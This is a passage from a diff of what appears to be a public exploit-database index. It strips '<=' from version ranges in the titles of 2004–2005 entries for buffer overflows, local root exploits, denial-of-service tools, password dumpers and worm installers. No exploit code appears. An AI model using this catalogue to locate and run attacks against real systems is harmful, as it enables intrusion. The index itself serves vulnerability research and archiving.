Exploit",2004-11-22,Komrade,windows,remote,0 -651,platforms/windows/dos/651.c,"Halo <= 1.05 - Broadcast Client Crash Exploit",2004-11-22,"Luigi Auriemma",windows,dos,0 +650,platforms/windows/remote/650.c,"CoffeeCup FTP Clients (Direct 6.2.0.62) (Free 3.0.0.10) - BoF Exploit",2004-11-22,Komrade,windows,remote,0 +651,platforms/windows/dos/651.c,"Halo 1.05 - Broadcast Client Crash Exploit",2004-11-22,"Luigi Auriemma",windows,dos,0 652,platforms/linux/remote/652.c,"Prozilla 1.3.6 - Remote Stack Overflow Exploit",2004-11-23,"Serkan Akpolat",linux,remote,8080 -653,platforms/windows/dos/653.c,"Soldier of Fortune II <= 1.3 Server/Client - Denial of Service Exploit",2004-11-23,"Luigi Auriemma",windows,dos,0 -654,platforms/windows/remote/654.c,"Winamp <= 5.06 - IN_CDDA.dll Remote Buffer Overflow Exploit",2004-11-24,k-otik,windows,remote,0 -655,platforms/windows/dos/655.c,"Star Wars Battlefront <= 1.1 - Fake Players Denial of Service Exploit",2004-11-24,"Luigi Auriemma",windows,dos,0 +653,platforms/windows/dos/653.c,"Soldier of Fortune II 1.3 Server/Client - Denial of Service Exploit",2004-11-23,"Luigi Auriemma",windows,dos,0 +654,platforms/windows/remote/654.c,"Winamp 5.06 - IN_CDDA.dll Remote Buffer Overflow Exploit",2004-11-24,k-otik,windows,remote,0 +655,platforms/windows/dos/655.c,"Star Wars Battlefront 1.1 - Fake Players Denial of Service Exploit",2004-11-24,"Luigi Auriemma",windows,dos,0 657,platforms/linux/local/657.c,"atari800 - Local Root Exploit",2004-11-25,pi3,linux,local,0 -658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP <= 1.52 - Remote Buffer Overflow Exploit",2004-11-25,class101,windows,remote,143 +658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP 1.52 - Remote Buffer Overflow Exploit",2004-11-25,class101,windows,remote,143 659,platforms/cgi/webapps/659.txt,"EZshopper - Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0 -660,platforms/linux/remote/660.c,"PHP <= 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 -662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0 +660,platforms/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 +662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0 663,platforms/windows/remote/663.py,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143 -664,platforms/windows/dos/664.c,"WS_FTP Server <= 5.03 - MKD Remote Buffer Overflow Exploit",2004-11-29,NoPh0BiA,windows,dos,0 -665,platforms/windows/dos/665.c,"Orbz Game <= 2.10 - Remote Buffer Overflow Exploit",2004-11-29,"Luigi Auriemma",windows,dos,0 -667,platforms/windows/dos/667.c,"Jana Server <= 2.4.4 - (http/pna) Denial of Service Exploit",2004-11-30,"Luigi Auriemma",windows,dos,0 +664,platforms/windows/dos/664.c,"WS_FTP Server 5.03 - MKD Remote Buffer Overflow Exploit",2004-11-29,NoPh0BiA,windows,dos,0 +665,platforms/windows/dos/665.c,"Orbz Game 2.10 - Remote Buffer Overflow Exploit",2004-11-29,"Luigi Auriemma",windows,dos,0 +667,platforms/windows/dos/667.c,"Jana Server 2.4.4 - (http/pna) Denial of Service Exploit",2004-11-30,"Luigi Auriemma",windows,dos,0 668,platforms/windows/remote/668.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit (C) (1)",2004-11-30,JohnH,windows,remote,143 669,platforms/linux/local/669.c,"Aspell (word-list-compress) Command Line Stack Overflow",2004-12-01,c0d3r,linux,local,0 670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (C) (2)",2004-12-01,JohnH,windows,remote,143 671,platforms/windows/dos/671.c,"Neverwinter Nights special Fake Players Denial of Service Exploit",2004-12-01,"Luigi Auriemma",windows,dos,0 -672,platforms/windows/dos/672.c,"Kreed <= 1.05 - Format String / Denial of Service Exploit",2004-12-02,"Luigi Auriemma",windows,dos,0 -673,platforms/php/webapps/673.cgi,"phpBB <= 2.0.10 - Remote Command Execution Exploit (CGI)",2004-12-03,ZzagorR,php,webapps,0 -675,platforms/windows/remote/675.txt,"Hosting Controller <= 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0 +672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service Exploit",2004-12-02,"Luigi Auriemma",windows,dos,0 +673,platforms/php/webapps/673.cgi,"phpBB 2.0.10 - Remote Command Execution Exploit (CGI)",2004-12-03,ZzagorR,php,webapps,0 +675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0 676,platforms/php/webapps/676.c,"phpBB 1.0.0 & 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 -677,platforms/windows/dos/677.txt,"GetRight <= 5.2a - Skin File (.grs) Buffer Overflow Exploit",2004-12-06,ATmaCA,windows,dos,0 -679,platforms/windows/dos/679.c,"Battlefield 1942 <= 1.6.19 + Vietnam <= 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0 +677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow Exploit",2004-12-06,ATmaCA,windows,dos,0 +679,platforms/windows/dos/679.c,"Battlefield 1942 <= 1.6.19 + Vietnam 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0 680,platforms/osx/local/680.txt,"Mac OS X Adobe Version Cue - Local Root Exploit (Bash)",2004-12-08,"Jonathan Bringhurst",osx,local,0 -681,platforms/linux/remote/681.c,"Citadel/UX <= 6.27 - Remote Root Format String Exploit",2004-12-12,CoKi,linux,remote,504 -682,platforms/windows/dos/682.c,"Codename Eagle <= 1.42 - Socket Unreacheable DoS Exploit",2004-12-13,"Luigi Auriemma",windows,dos,0 +681,platforms/linux/remote/681.c,"Citadel/UX 6.27 - Remote Root Format String Exploit",2004-12-12,CoKi,linux,remote,504 +682,platforms/windows/dos/682.c,"Codename Eagle 1.42 - Socket Unreacheable DoS Exploit",2004-12-13,"Luigi Auriemma",windows,dos,0 683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable DoS",2004-12-13,"Luigi Auriemma",windows,dos,0 -684,platforms/linux/local/684.c,"TipxD <= 1.1.1 - Local Format String (not setuid)",2004-12-14,CoKi,linux,local,0 -685,platforms/linux/dos/685.c,"Linux Kernel <= 2.4.28 / <= 2.6.9 - scm_send Local DoS Exploit",2004-12-14,"Paul Starzetz",linux,dos,0 -686,platforms/linux/dos/686.c,"Linux Kernel <= 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service Exploit",2004-12-14,"Paul Starzetz",linux,dos,0 +684,platforms/linux/local/684.c,"TipxD 1.1.1 - Local Format String (not setuid)",2004-12-14,CoKi,linux,local,0 +685,platforms/linux/dos/685.c,"Linux Kernel 2.4.28 / <= 2.6.9 - scm_send Local DoS Exploit",2004-12-14,"Paul Starzetz",linux,dos,0 +686,platforms/linux/dos/686.c,"Linux Kernel 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service Exploit",2004-12-14,"Paul Starzetz",linux,dos,0 687,platforms/windows/dos/687.c,"OpenText FirstClass 8.0 - HTTP Daemon /Search Remote DoS",2004-12-15,dila,windows,dos,0 688,platforms/hardware/dos/688.c,"Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service Exploit",2004-12-15,x90c,hardware,dos,0 -689,platforms/multiple/remote/689.pl,"wget <= 1.9 - Directory Traversal Exploit",2004-12-15,jjminar,multiple,remote,0 -690,platforms/linux/dos/690.c,"Linux Kernel <= 2.6.9 / <= 2.4.28 - vc_resize int Local Overflow Exploit",2004-12-16,"Georgi Guninski",linux,dos,0 -691,platforms/linux/dos/691.c,"Linux Kernel <= 2.6.9 / <= 2.4.28 - Memory Leak Local DoS",2004-12-16,"Georgi Guninski",linux,dos,0 -692,platforms/linux/dos/692.c,"Linux Kernel <= 2.6.9 / <= 2.4.28 - ip_options_get Local Overflow",2004-12-16,"Georgi Guninski",linux,dos,0 -693,platforms/windows/remote/693.c,"Ability Server <= 2.34 - Remote APPE Buffer Overflow Exploit",2004-12-16,darkeagle,windows,remote,21 -694,platforms/windows/local/694.c,"WinRAR <= 3.4.1 - Corrupt ZIP File PoC",2004-12-16,"Vafa Khoshaein",windows,local,0 -695,platforms/linux/local/695.c,"Cscope <= 15.5 - Symlink Exploit",2004-12-17,Gangstuck,linux,local,0 -697,platforms/php/webapps/697.c,"PHP <= 4.3.9 & phpBB 2.x - unserialize() Remote Exploit (compiled)",2004-12-17,overdose,php,webapps,0 +689,platforms/multiple/remote/689.pl,"wget 1.9 - Directory Traversal Exploit",2004-12-15,jjminar,multiple,remote,0 +690,platforms/linux/dos/690.c,"Linux Kernel 2.6.9 / <= 2.4.28 - vc_resize int Local Overflow Exploit",2004-12-16,"Georgi Guninski",linux,dos,0 +691,platforms/linux/dos/691.c,"Linux Kernel 2.6.9 / <= 2.4.28 - Memory Leak Local DoS",2004-12-16,"Georgi Guninski",linux,dos,0 +692,platforms/linux/dos/692.c,"Linux Kernel 2.6.9 / <= 2.4.28 - ip_options_get Local Overflow",2004-12-16,"Georgi Guninski",linux,dos,0 +693,platforms/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow Exploit",2004-12-16,darkeagle,windows,remote,21 +694,platforms/windows/local/694.c,"WinRAR 3.4.1 - Corrupt ZIP File PoC",2004-12-16,"Vafa Khoshaein",windows,local,0 +695,platforms/linux/local/695.c,"Cscope 15.5 - Symlink Exploit",2004-12-17,Gangstuck,linux,local,0 +697,platforms/php/webapps/697.c,"PHP 4.3.9 & phpBB 2.x - unserialize() Remote Exploit (compiled)",2004-12-17,overdose,php,webapps,0 698,platforms/ultrix/local/698.c,"Ultrix 4.5/MIPS dxterm Local Buffer Overflow Exploit",2004-12-20,"Kristoffer BrÃ¥nemyr",ultrix,local,0 699,platforms/aix/local/699.c,"AIX 5.1 < 5.3 - paginit Local Stack Overflow Exploit",2004-12-20,cees-bart,aix,local,0 700,platforms/windows/dos/700.html,"Microsoft Internet Explorer & MSN Memory_Access_Violation DoS",2004-12-21,"Emmanouel Kellinis",windows,dos,0 @@ -558,68 +558,68 @@ id,file,description,date,author,platform,type,port 716,platforms/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin /bin/login - Buffer Overflow Exploit (SPARC)",2004-12-24,"Marco Ivaldi",solaris,remote,513 718,platforms/linux/local/718.c,"Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation Exploit",2004-12-24,"Marco Ivaldi",linux,local,0 719,platforms/windows/remote/719.txt,"Microsoft Internet Explorer XP SP2 - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote,0 -720,platforms/php/webapps/720.pl,"Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,anonymous,php,webapps,0 +720,platforms/php/webapps/720.pl,"Sanity.b - phpBB 2.0.10 Bot Install (AOL/Yahoo Search)",2004-12-25,anonymous,php,webapps,0 721,platforms/windows/dos/721.html,"Microsoft Windows Kernel - ANI File Parsing Crash",2004-12-25,Flashsky,windows,dos,0 725,platforms/php/webapps/725.pl,"PhpInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion",2004-12-25,anonymous,php,webapps,0 726,platforms/windows/remote/726.c,"Netcat 1.1 - '-e' Switch Remote Buffer Overflow Exploit",2004-12-26,class101,windows,remote,0 -729,platforms/windows/remote/729.txt,"PHP <= 4.3.7 - openlog() Buffer Overflow Exploit",2004-12-28,"The Warlock [BhQ]",windows,remote,80 +729,platforms/windows/remote/729.txt,"PHP 4.3.7 - openlog() Buffer Overflow Exploit",2004-12-28,"The Warlock [BhQ]",windows,remote,80 730,platforms/windows/remote/730.html,"Microsoft Internet Explorer Remote Code Execution with Parameters - PoC",2004-12-28,ShredderSub7,windows,remote,0 733,platforms/windows/remote/733.c,"Microsoft Windows 2000 - WINS Remote Code Execution Exploit",2004-12-31,zuc,windows,remote,42 734,platforms/windows/remote/734.c,"Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)",2004-12-31,houseofdabus,windows,remote,139 -736,platforms/windows/dos/736.c,"SOLDNER Secret Wars <= 30830 - Denial of Service Exploit",2005-01-04,"Luigi Auriemma",windows,dos,20000 +736,platforms/windows/dos/736.c,"SOLDNER Secret Wars 30830 - Denial of Service Exploit",2005-01-04,"Luigi Auriemma",windows,dos,20000 737,platforms/php/webapps/737.txt,"QWikiwiki Directory Traversal",2005-01-04,Madelman,php,webapps,0 738,platforms/php/dos/738.c,"iWebNegar 1.1 - Configuration Nullification Denial of Service Exploit",2005-01-04,c0d3r,php,dos,0 739,platforms/bsd/local/739.c,"FreeBSD TOP Format String",2001-07-23,truefinder,bsd,local,0 -740,platforms/php/webapps/740.pl,"phpBB <= 2.0.10 - Bot Install (Altavista) (ssh.D.Worm)",2005-01-04,"Severino Honorato",php,webapps,0 -741,platforms/linux/local/741.pl,"HTGET <= 0.9.x - Local Root Exploit",2005-01-05,nekd0,linux,local,0 -742,platforms/windows/dos/742.c,"Gore <= 1.50 - Socket Unreacheable Denial of Service Exploit",2005-01-06,"Luigi Auriemma",windows,dos,0 +740,platforms/php/webapps/740.pl,"phpBB 2.0.10 - Bot Install (Altavista) (ssh.D.Worm)",2005-01-04,"Severino Honorato",php,webapps,0 +741,platforms/linux/local/741.pl,"HTGET 0.9.x - Local Root Exploit",2005-01-05,nekd0,linux,local,0 +742,platforms/windows/dos/742.c,"Gore 1.50 - Socket Unreacheable Denial of Service Exploit",2005-01-06,"Luigi Auriemma",windows,dos,0 743,platforms/windows/dos/743.html,"Norton Antivirus < 2005 - Remote Stack Overflow Exploit",2005-01-06,"Rafel Ivgi",windows,dos,0 -744,platforms/linux/local/744.c,"Linux Kernel <= 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0 +744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0 745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000 746,platforms/multiple/remote/746.pl,"Webmin 1.5 - BruteForce + Command Execution",2005-01-08,ZzagorR,multiple,remote,10000 749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0 750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow",2005-01-11,class101,windows,remote,6101 753,platforms/windows/remote/753.html,"Microsoft Internet Explorer .ANI Remote Stack Overflow (0.2)",2005-01-12,Skylined,windows,remote,0 -754,platforms/php/webapps/754.pl,"ITA Forum <= 1.49 - SQL Injection Exploit",2005-01-13,RusH,php,webapps,0 -755,platforms/windows/dos/755.c,"Breed <= patch #1 - zero-length Remote Crash Exploit",2005-01-13,"Luigi Auriemma",windows,dos,7649 -756,platforms/linux/local/756.c,"Exim <= 4.41 - dns_build_reverse Local Exploit PoC",2005-01-15,"Rafael Carrasco",linux,local,0 +754,platforms/php/webapps/754.pl,"ITA Forum 1.49 - SQL Injection Exploit",2005-01-13,RusH,php,webapps,0 +755,platforms/windows/dos/755.c,"Breed patch #1 - zero-length Remote Crash Exploit",2005-01-13,"Luigi Auriemma",windows,dos,7649 +756,platforms/linux/local/756.c,"Exim 4.41 - dns_build_reverse Local Exploit PoC",2005-01-15,"Rafael Carrasco",linux,local,0 758,platforms/osx/remote/758.c,"Apple iTunes Playlist Local Parsing Buffer Overflow Exploit",2005-01-16,nemo,osx,remote,0 759,platforms/windows/remote/759.cpp,"Apple iTunes Playlist Buffer Overflow Download Shellcoded Exploit",2005-01-16,ATmaCA,windows,remote,0 -760,platforms/windows/local/760.cpp,"Peer2Mail <= 1.4 - Encrypted Password Dumper Exploit",2005-01-16,ATmaCA,windows,local,0 +760,platforms/windows/local/760.cpp,"Peer2Mail 1.4 - Encrypted Password Dumper Exploit",2005-01-16,ATmaCA,windows,local,0 761,platforms/windows/remote/761.cpp,"NodeManager Professional 2.00 - Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162 -762,platforms/osx/dos/762.c,"Mac OS X <= 10.3.7 - Input Validation Flaw parse_machfile() DoS",2005-01-20,nemo,osx,dos,0 -763,platforms/linux/local/763.c,"fkey <= 0.0.2 - Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79 +762,platforms/osx/dos/762.c,"Mac OS X 10.3.7 - Input Validation Flaw parse_machfile() DoS",2005-01-20,nemo,osx,dos,0 +763,platforms/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility Exploit",2005-01-20,vade79,linux,local,79 764,platforms/linux/remote/764.c,"Apache OpenSSL - 'OpenFuckV2.c' Remote Exploit",2003-04-04,spabam,linux,remote,80 765,platforms/windows/remote/765.c,"Microsoft Internet Explorer .ANI files handling Universal Exploit (MS05-002)",2005-01-22,houseofdabus,windows,remote,0 -766,platforms/osx/local/766.c,"Mac OS X <= 10.3.7 - mRouter Local Privilege Escalation Exploit",2005-01-22,nemo,osx,local,0 -767,platforms/windows/remote/767.pl,"Golden FTP Server <= 2.02b - Remote Buffer Overflow Exploit",2005-01-22,Barabas,windows,remote,21 +766,platforms/osx/local/766.c,"Mac OS X 10.3.7 - mRouter Local Privilege Escalation Exploit",2005-01-22,nemo,osx,local,0 +767,platforms/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow Exploit",2005-01-22,Barabas,windows,remote,21 769,platforms/windows/local/769.c,"Funduc Search and Replace Compressed File Local BoF Exploit",2005-01-24,ATmaCA,windows,local,0 -770,platforms/windows/dos/770.txt,"Apple QuickTime <= 6.5.2.10 - (.qtif) Image Parsing",2005-01-24,ATmaCA,windows,dos,0 +770,platforms/windows/dos/770.txt,"Apple QuickTime 6.5.2.10 - (.qtif) Image Parsing",2005-01-24,ATmaCA,windows,dos,0 771,platforms/windows/remote/771.cpp,"Microsoft Internet Explorer .ANI files handling Downloader Exploit (MS05-002)",2005-01-24,Vertygo,windows,remote,0 772,platforms/cgi/webapps/772.c,"AWStats (6.0-6.2) - configdir Remote Command Execution Exploit (C)",2005-01-25,THUNDER,cgi,webapps,0 773,platforms/cgi/webapps/773.pl,"AWStats (6.0-6.2) - configdir Remote Command Execution Exploit (Perl)",2005-01-25,GHC,cgi,webapps,0 -774,platforms/php/webapps/774.pl,"Siteman <= 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0 -775,platforms/linux/remote/775.c,"Berlios gpsd <= 2.7.x - Remote Format String",2005-01-26,JohnH,linux,remote,2947 +774,platforms/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition Exploit",2005-01-25,"Noam Rathaus",php,webapps,0 +775,platforms/linux/remote/775.c,"Berlios gpsd 2.7.x - Remote Format String",2005-01-26,JohnH,linux,remote,2947 776,platforms/linux/local/776.c,"/usr/bin/trn - Local Exploit (not suid)",2005-01-26,ZzagorR,linux,local,0 778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Escalation Exploit (2)",2005-01-27,"Tim Hsu",linux,local,0 779,platforms/linux/local/779.sh,"Linux ncpfs - Local Exploit",2005-01-30,super,linux,local,0 -780,platforms/windows/dos/780.c,"Xpand Rally <= 1.0.0.0 (Server/Clients) - Crash Exploit",2005-01-31,"Luigi Auriemma",windows,dos,28015 +780,platforms/windows/dos/780.c,"Xpand Rally 1.0.0.0 (Server/Clients) - Crash Exploit",2005-01-31,"Luigi Auriemma",windows,dos,28015 781,platforms/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit (1)",2005-02-01,"Tal Zeltzer",windows,remote,80 782,platforms/windows/dos/782.pl,"TinyWeb 1.9 - Denial of Service Exploit",2005-02-01,karak0rsan,windows,dos,80 -783,platforms/windows/dos/783.c,"Painkiller <= 1.35 - in-game cd-key alpha-numeric Buffer Overflow Exploit",2005-02-02,"Luigi Auriemma",windows,dos,0 -784,platforms/linux/remote/784.c,"ngIRCd <= 0.8.2 - Remote Format String Exploit",2005-02-03,CoKi,linux,remote,6667 +783,platforms/windows/dos/783.c,"Painkiller 1.35 - in-game cd-key alpha-numeric Buffer Overflow Exploit",2005-02-02,"Luigi Auriemma",windows,dos,0 +784,platforms/linux/remote/784.c,"ngIRCd 0.8.2 - Remote Format String Exploit",2005-02-03,CoKi,linux,remote,6667 785,platforms/linux/remote/785.c,"Newspost 2.1 - socket_getline() Remote Buffer Overflow Exploit (2)",2005-02-03,cybertronic,linux,remote,119 786,platforms/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,php,webapps,0 787,platforms/windows/remote/787.pl,"Savant Web Server 3.1 - Remote Buffer OverflowExploit (Windows 2003)",2005-02-04,CorryL,windows,remote,80 788,platforms/linux/local/788.pl,"Operator Shell (osh) 1.7-12 - Local Root Exploit",2005-02-05,"Charles Stevenson",linux,local,0 -789,platforms/linux/dos/789.c,"ngIRCd <= 0.8.1 - Remote Denial of Service Exploit (2)",2005-02-05,CorryL,linux,dos,6667 +789,platforms/linux/dos/789.c,"ngIRCd 0.8.1 - Remote Denial of Service Exploit (2)",2005-02-05,CorryL,linux,dos,6667 790,platforms/cgi/webapps/790.pl,"PerlDesk 1.x SQL-Injection Exploit",2005-02-05,deluxe89,cgi,webapps,0 791,platforms/linux/local/791.c,"Setuid perl PerlIO_Debug() Overflow",2005-02-07,"Kevin Finisterre",linux,local,0 792,platforms/linux/local/792.c,"Setuid perl PerlIO_Debug() Root owned file creation",2005-02-07,"Kevin Finisterre",linux,local,0 793,platforms/osx/local/793.pl,"Mac OS X DS_Store Arbitrary File Overwrite Exploit",2005-02-07,vade79,osx,local,0 794,platforms/windows/remote/794.c,"3CServer 1.1 - FTP Server Remote Exploit",2005-02-07,mandragore,windows,remote,21 795,platforms/osx/local/795.pl,"Mac OS X Adobe Version Cue - Local Root Exploit (Perl)",2005-02-07,0xdeadbabe,osx,local,0 -796,platforms/linux/local/796.sh,"Exim <= 4.42 - Local Root Exploit",2005-02-07,darkeagle,linux,local,0 +796,platforms/linux/local/796.sh,"Exim 4.42 - Local Root Exploit",2005-02-07,darkeagle,linux,local,0 797,platforms/windows/dos/797.py,"Foxmail 2.0 - (MAIL FROM:) Denial of Service Exploit",2005-02-07,OYXin,windows,dos,0 798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0 799,platforms/osx/dos/799.c,"Mac OS X AppleFileServer Remote Denial of Service Exploit",2005-02-08,nemo,osx,dos,0 @@ -628,22 +628,22 @@ id,file,description,date,author,platform,type,port 802,platforms/windows/remote/802.cpp,"MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit",2005-02-09,ATmaCA,windows,remote,0 803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users Exploit",2005-02-09,Kozan,windows,local,0 804,platforms/windows/remote/804.c,"MSN Messenger PNG Image Buffer Overflow (linux compile)",2005-02-09,dgr,windows,remote,0 -805,platforms/multiple/remote/805.c,"ELOG <= 2.5.6 - Remote Shell Exploit",2005-02-09,n4rk0tix,multiple,remote,8080 -806,platforms/linux/remote/806.c,"Prozilla <= 1.3.7.3 - Remote Format String Exploit",2005-02-09,"Serkan Akpolat",linux,remote,8080 +805,platforms/multiple/remote/805.c,"ELOG 2.5.6 - Remote Shell Exploit",2005-02-09,n4rk0tix,multiple,remote,8080 +806,platforms/linux/remote/806.c,"Prozilla 1.3.7.3 - Remote Format String Exploit",2005-02-09,"Serkan Akpolat",linux,remote,8080 807,platforms/php/webapps/807.txt,"MyPHP Forum 1.0 - SQL Injection Exploit",2005-02-10,GHC,php,webapps,0 808,platforms/php/webapps/808.txt,"CMScore SQL Injection Exploit",2005-02-10,GHC,php,webapps,0 809,platforms/php/webapps/809.txt,"Chipmunk Forums SQL Injection Exploit",2005-02-10,GHC,php,webapps,0 -810,platforms/windows/dos/810.c,"Armagetron Advanced <= 0.2.7.0 - Server Crash Exploit",2005-02-10,"Luigi Auriemma",windows,dos,0 +810,platforms/windows/dos/810.c,"Armagetron Advanced 0.2.7.0 - Server Crash Exploit",2005-02-10,"Luigi Auriemma",windows,dos,0 811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Local Exploit",2005-02-10,Kozan,windows,local,0 -812,platforms/linux/remote/812.c,"Exim <= 4.43 - auth_spa_server() Remote PoC Exploit",2005-02-12,"Yuri Gushin",linux,remote,25 +812,platforms/linux/remote/812.c,"Exim 4.43 - auth_spa_server() Remote PoC Exploit",2005-02-12,"Yuri Gushin",linux,remote,25 813,platforms/windows/dos/813.c,"Quake 3 Engine Infostring Crash and Shutdown Exploit",2005-02-12,"Luigi Auriemma",windows,dos,0 -814,platforms/php/webapps/814.txt,"MercuryBoard <= 1.1.1 - SQL Injection",2005-02-12,Zeelock,php,webapps,0 +814,platforms/php/webapps/814.txt,"MercuryBoard 1.1.1 - SQL Injection",2005-02-12,Zeelock,php,webapps,0 815,platforms/linux/dos/815.c,"CA BrightStor ARCserve Backup Remote Buffer Overlow PoC",2005-02-12,cybertronic,linux,dos,0 816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID)",2005-02-13,lizard,linux,local,0 -817,platforms/cgi/dos/817.pl,"AwStats <= 6.4 - Denial of Service",2005-02-14,GHC,cgi,dos,0 -818,platforms/php/webapps/818.txt,"vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (1)",2005-02-14,AL3NDALEEB,php,webapps,0 +817,platforms/cgi/dos/817.pl,"AwStats 6.4 - Denial of Service",2005-02-14,GHC,cgi,dos,0 +818,platforms/php/webapps/818.txt,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (1)",2005-02-14,AL3NDALEEB,php,webapps,0 819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote BoF (French Windows OS support)",2005-02-15,"Jerome Athias",windows,remote,80 -820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0 +820,platforms/php/webapps/820.php,"vBulletin 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0 822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow Exploit",2004-01-30,Skylined,windows,remote,21 823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit",2004-02-11,Skylined,windows,remote,21 824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0 @@ -654,7 +654,7 @@ id,file,description,date,author,platform,type,port 829,platforms/hardware/remote/829.c,"Thomson TCW690 POST Password Validation Exploit",2005-02-19,MurDoK,hardware,remote,80 830,platforms/windows/remote/830.c,"SHOUTcast 1.9.4 - File Request Format String Remote Exploit (Windows)",2005-02-19,mandragore,windows,remote,8000 831,platforms/linux/remote/831.c,"GNU Cfengine 2.17p1 RSA Authentication Heap Overflow Exploit",2005-02-20,jsk,linux,remote,5803 -832,platforms/php/webapps/832.txt,"vBulletin <= 3.0.6 - PHP Code Injection",2005-02-22,pokley,php,webapps,0 +832,platforms/php/webapps/832.txt,"vBulletin 3.0.6 - PHP Code Injection",2005-02-22,pokley,php,webapps,0 833,platforms/windows/local/833.cpp,"PeerFTP 5 - Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0 834,platforms/windows/local/834.c,"eXeem 0.21 - Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0 835,platforms/windows/local/835.c,"SendLink 1.5 - Local Password Disclosure Exploit",2005-02-22,Kozan,windows,local,0 @@ -664,122 +664,122 @@ id,file,description,date,author,platform,type,port 839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager Local Password Disclosure Exploit",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0 840,platforms/cgi/webapps/840.c,"AWStats 5.7 < 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0 841,platforms/windows/dos/841.c,"Soldier of Fortune 2 <= 1.03 - 'cl_guid' Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0 -842,platforms/linux/dos/842.c,"wu-ftpd <= 2.6.2 - File Globbing Denial of Service Exploit",2005-02-25,str0ke,linux,dos,0 -843,platforms/windows/dos/843.c,"Knet <= 1.04c - Buffer Overflow Denial of Service Exploit",2005-02-25,CorryL,windows,dos,0 +842,platforms/linux/dos/842.c,"wu-ftpd 2.6.2 - File Globbing Denial of Service Exploit",2005-02-25,str0ke,linux,dos,0 +843,platforms/windows/dos/843.c,"Knet 1.04c - Buffer Overflow Denial of Service Exploit",2005-02-25,CorryL,windows,dos,0 844,platforms/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure Exploit (asm)",2005-02-26,illwill,windows,local,0 